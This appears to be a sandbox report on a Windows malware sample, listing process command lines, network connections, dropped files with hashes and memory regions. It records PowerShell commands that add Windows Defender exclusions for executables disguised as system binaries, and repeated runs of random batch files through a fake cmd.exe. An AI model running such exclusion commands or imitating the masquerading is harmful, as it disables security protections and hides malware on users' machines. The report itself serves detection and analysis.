"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\spoolsv.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\winlogon.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Desktop\DllCommonsvc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\spoolsv.exe'

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5Ad8adCyX4.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Urxb3wPgb0.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RBOUzXbIOW.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FEON83D8AI.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\V3SaMhi525.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yWf31kVUUl.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0Sh6ipYOoX.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fmZn61weJC.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MzhLoGhvPq.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

Network

Country Destination Domain Proto
FR 2.16.119.157:443 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 20.42.65.84:443 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 209.197.3.8:80 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp

Files

C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

MD5 8088241160261560a02c84025d107592
SHA1 083121f7027557570994c9fc211df61730455bb5
SHA256 2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1
SHA512 20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

C:\providercommon\1zu9dW.bat

MD5 6783c3ee07c7d151ceac57f1f9c8bed7
SHA1 17468f98f95bf504cc1f83c49e49a78526b3ea03
SHA256 8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322
SHA512 c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

C:\providercommon\DllCommonsvc.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

C:\Users\Admin\AppData\Local\Temp\5Ad8adCyX4.bat

MD5 4a7162c87abef77d3ebe0cbf2c74583f
SHA1 1cc8da99f8f6433f319af7cf75def028da2fcad0
SHA256 e928cbb1fd187bf9eec0e87d502096c017e3f6583047417ac2313e30d009bc2f
SHA512 a618822fbe4721e0b4d59e1af74d1d5e8051bc199f3749adaf94ea4a64deb1b1b1f8d6a2e51451914eceecb336cd507d41245e1aaec6c66998fe53c8719d334e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 976f9460c70c6152d51268c92047a9e4
SHA1 d6364332ef19040f010312179575875326c215c6
SHA256 55bafe6cd2eaad40f35b53760b279da4c82ea3f01516db37345cd86cc098fd5a
SHA512 b65de14b9dfb38fbd927b4ebeaa35155abdb956f90dc407e312abf396255a682af089ce84c6f40b95cdd37cb4243caadf5ead774d81258cf21f4b611ebda584c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c2943e6810526c25038dd1a31befc379
SHA1 87017f5ee9970737227f781c0c6b8bcf85008358
SHA256 ea410c57a98d3db8aba617008450a4edce3006e8e6862c9c00d603322c96294b
SHA512 9f718dc6507d522c35916629d2829e9b40e0652ee230f3ade282ecf93bdf016d33543358e9166402f47f1c47181a3e4dde014fe34742ba49cdb1e663dbfd5aa7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 97b14663be775e32d0cc41d78134d6eb
SHA1 d241a154331d5bfa64d7ccbfa2580d122d075402
SHA256 69b0dc302c87db15b96c476b8d45eefd110d765551a131e66ffa2fffa4b16579
SHA512 0d2c7dca6affbad1cac7f04d609ea41335c974fdb56e783c560cc69b9579248d20ad41ea55504f73cc645e755441bf71837c6e1e7058a841028573fa67f66108

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7ff35987e8cb655bbe1bd2e66a275ed7
SHA1 ec6d9c4a6e9bdf05dc90cc72822dc9b10fdc1a7d
SHA256 6563911ae23e0ffb69ed44b2fca3df0d7060568c7c891b47b83fa0d4fe8974ee
SHA512 70f2f830e56869932c387bd00c526e8fd073feb64de90e56a772fd87f269285f96c9d63991e3073ab62dd1687abfc0f1babc1b52a58896a6a92b517dd6343ea9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1488f354afb98ba2457d9dc864a365da
SHA1 fccb09a5edf67b6578109cd9007d3750e689ae1e
SHA256 253b7961e7a52f9713810ebaee3f751953c48989dbb84f7202ebfb5496fc99c7
SHA512 6d2b1b1c38c16507395c97d0a13f7a4020db702558a1a52e2d9f6a229e09d0d2acda3192406fc7a3646ef7a0a4fd63d8ab958376a89e3dd617b4115a4a19a06c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 728626f943ea1c38299fcb2c2d10f15a
SHA1 7fbc7446bde20ba67b6a71319eb873007c29258e
SHA256 35ea4443dea27b8dd62727eb5e1f63814fb955325ba02dedde435fcd0700b044
SHA512 57b6caa34e7194459a981a2eba03a79ebc71edb2253ed5f9491d839c1a365dfa8b73db2cea0d669ea07c3375cd9927eb1643237505c71788b2a6db30a31ed3ef

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0671e061cef525069ed8bfb11348e499
SHA1 53aa6cea45d79410643a419e8a9dbf71f2ffee6b
SHA256 f9c1eb456165bce6650eb80f644b1f8ccd93d0fc0477cce4816ea7bee092fdd9
SHA512 d5436e48e262e09cb121e3d4322b0452f0e88052d6039956688e67097ca346d2a69245b69e597d94d6b97225814b859edfea10021839f9ddd50156eb8c7053fd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3dfac0307d8327e3d4167f3963144847
SHA1 beac2898d4dc2f80478a850e3bbdf8e3d3eb9a80
SHA256 abe9badb7e88a3e4694396520a2356f4c0b9f56a42bbd5b6b1064a454a7d08c3
SHA512 d2364cf53ff67598d056a76d1d5e2f6cf4bba5ac64900ec251d2cdda5387b88e263c4251debcce3f1db0e3297cb8e254938d05a9bb1944108f995b70d0bee39d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f4d443c7b4a9abe6ab3a6125e40614e5
SHA1 fa72c5c2196fd51ebecd1f79a4619cd3b53db094
SHA256 bc2a665f349bbda6d57a75f562ef8c3d2c518ac6802b130b94ba759b82e63659
SHA512 d938a0d27212cce0f342bda7ffd3e674a35abfd64b9647cd4437688939af603812b4685484b82d9367fb44da8673111294f0e0c8c1d85a09d181adaf5dfbf6ce

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7cc9d0d8a92db6ee0dcf5b86e817b045
SHA1 16f420f3c9e38e4eea9dc8c81ed247b607b321be
SHA256 3322b3acb6fe98777c4d1fe63d9fc57bf8104db3ec1ebc0be656bce983eedb2f
SHA512 d4f1763fb78d7e005cf9968e5aad22d0aeb889ee94392c23309c07d0206cd23dae0b53a51872a6ac0de833c507f01a271622985aeb1f3b490e8babb52869a832

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cmd.exe.log

MD5 d63ff49d7c92016feb39812e4db10419
SHA1 2307d5e35ca9864ffefc93acf8573ea995ba189b
SHA256 375076241775962f3edc08a8c72832a00920b427a4f3332528d91d21e909fa12
SHA512 00f8c8d0336d6575b956876183199624d6f4d2056f2c0aa633a6f17c516f22ee648062d9bc419254d84c459323e9424f0da8aed9dd4e16c2926e5ba30e797d8a

C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat

MD5 b1bfd3abafebdf2307c19462ecd2f37d
SHA1 40f92e29aabce2a465d18f3e967f60102816e3cb
SHA256 6d0176370e886f7b2a61f00884dffcace089b098eb8309e9f4c0104e24611f90
SHA512 bdc5f0a0d3320ff1bbe98e66949f85fb36bd4e80ba64785924b9ebfc209df6146b1249a80f2a0881573262807bfce0e5006e0769d2e27145d8b174d5819854bc

C:\Users\Admin\AppData\Local\Temp\Urxb3wPgb0.bat

MD5 989fd95c6c29ee3d58d6004ce1d8bdc4
SHA1 560990b58082ca5506d6b86cb12e091d81b819a9
SHA256 1215d04cdce43b980f3da80d70689ea148b9e31fa2cddabb0b07222d3f3a47b6
SHA512 1b59a09992b3e8c8588afe273100725b60c8bbbf99d7046fea4bb958e6b3a520cf90f5415c7f98f5cdd6369e9c8b9211290e40d5921b353ffeec6164e2f50533

C:\Users\Admin\AppData\Local\Temp\RBOUzXbIOW.bat

MD5 4de341373f31eacae325ac46ace20fb0
SHA1 64336ad918fa2e00500d14f8074eef4bc3e1d6a9
SHA256 69036e54d61b80510a59aa84823efcb15faa94a25b9840a3336e549cd44167ef
SHA512 027a27e1f567f28df045b643aacd8f444e93423527294fcc633e1e9b75c4b298145188ea166b4379afb1c6aa27c212f1492a931c88b64adfaaae57f564554eaa

C:\Users\Admin\AppData\Local\Temp\FEON83D8AI.bat

MD5 fdb53026d0e27f2bd0417b1ba90f0b94
SHA1 d224dd7ec31563b03e73f55893cebdb7e2592119
SHA256 ae16ead192c1094d57514b3ac38f6dcc0c5aa9b9f2661ebfd44a8f8dc37d8a2b
SHA512 76e6480820848df7d440da14610116726f2ef493ee7d9edf05284b3973dc02a6a75d9ef9ff511c949beac6b9fe829b322154f0af9babc0eeb3ccb2a474106b1d

memory/5424-917-0x0000000000000000-mapping.dmp

memory/5916-918-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/3068-920-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\V3SaMhi525.bat

MD5 76ab68a8972cbbe844302bf8806de464
SHA1 d1913e1d71b1965c68b04cffe8818af7e3f8b07d
SHA256 43b175c63e7a89c77323de0cb7d99a4496514bbe768b79db963e3a426c01e9bd
SHA512 673b108b24e8912832385a86eece9b2fe8044ada1c41b693ad456309c79ef96b98d71be114e1977f1fe943a8e2dee31b05e897a23a6205d138081f6b6f954212

memory/4764-922-0x0000000000000000-mapping.dmp

memory/220-923-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/220-925-0x0000000002380000-0x0000000002392000-memory.dmp

memory/3816-926-0x0000000000000000-mapping.dmp

memory/4440-928-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\yWf31kVUUl.bat

MD5 d409a80e87c162cbc3611d24b84685d4
SHA1 abac0c1c107a089131a47a63b14a6727f274becb
SHA256 ce2c9b8c85bd2c75d2f3fce97ffc519584299988bcd55dfb648732ae53913c30
SHA512 9db49e75a291b9732164c2fadfe1d5500aca95a02eafb297c1e4c6056c80fffffba892f174cc6f244a1a98f0aeedac7cce545b0ea087cff985e7386b8670c717

memory/5680-929-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/5680-931-0x00000000011A0000-0x00000000011B2000-memory.dmp

memory/5100-932-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\0Sh6ipYOoX.bat

MD5 cc08685f9e0d1623b4c4bb9d62d93317
SHA1 3b346d89d0d1e3a679807c7150e982740e59896a
SHA256 cf2a9b82832787e9a7babd802d1d19e8eb6d9ac075a004a5d384ec4870dba41d
SHA512 77f5203c0962c5868a485aa9b53558997ac32cc64fd683a5fae464acd9b25b44608dce72d3f615f5220cb9d6aee611cd92e5e94e723d3c851adda1054a7d58e1

memory/3540-934-0x0000000000000000-mapping.dmp

memory/4556-935-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/4556-937-0x0000000000F10000-0x0000000000F22000-memory.dmp

memory/4736-938-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat

MD5 72b6f50c384447697b7eb99e69f48cb6
SHA1 723a06f2b29e630b5498a2eeb9833e1fc09e9b01
SHA256 31ca9bf092f06a1a3e5b9322076f21cbf896977a8080864363e11d268c6e773a
SHA512 66da06c93caac94fe7319f70a1fd783f1c43bb1d978cd329c616a638ecfd8035586cc1d3f1ec2150d8ec20277dacb4b940298a68b304a84bbeec7acdc314df68

memory/4236-940-0x0000000000000000-mapping.dmp

memory/4776-941-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/4776-943-0x0000000000AC0000-0x0000000000AD2000-memory.dmp

memory/4004-944-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\fmZn61weJC.bat

MD5 539940dcbc1dfb2a93f8dcb00a6c9abe
SHA1 8afafddc7ca0fccc1960ad2fc399c6cb0da34d07
SHA256 8248d904521bfa884e595fc0dcdf2d5fd90e3f48457e54adad700ccd82ca0577
SHA512 e6f69d2af2485489c9192c2ba843c745bb37c1fc4e95ba6a6aec2eca699aa37ca64da955ce3497769aa69a08242977db50a35edefe232ee922ebc2e6da468de0

memory/5736-946-0x0000000000000000-mapping.dmp

memory/4704-947-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/4704-949-0x0000000002840000-0x0000000002852000-memory.dmp

memory/4888-950-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\MzhLoGhvPq.bat

MD5 e5e8ba84bd0ffb14d3c570089fa46597
SHA1 5ef13dba9c4970c948994d485a60bb9983214d96
SHA256 d815aacea47f122c14ac370249f0b87d7b4a47610cc3d0112dec5a85d7b81b3c
SHA512 310257f4fdf9303914c6c111b321062c2bcf1c1849107960243dea1e4a802b4e7ca31a2da478b81a74b9fbf1bc7eab57d542d9593e70f0ba68c00c184ed79d55

memory/2804-952-0x0000000000000000-mapping.dmp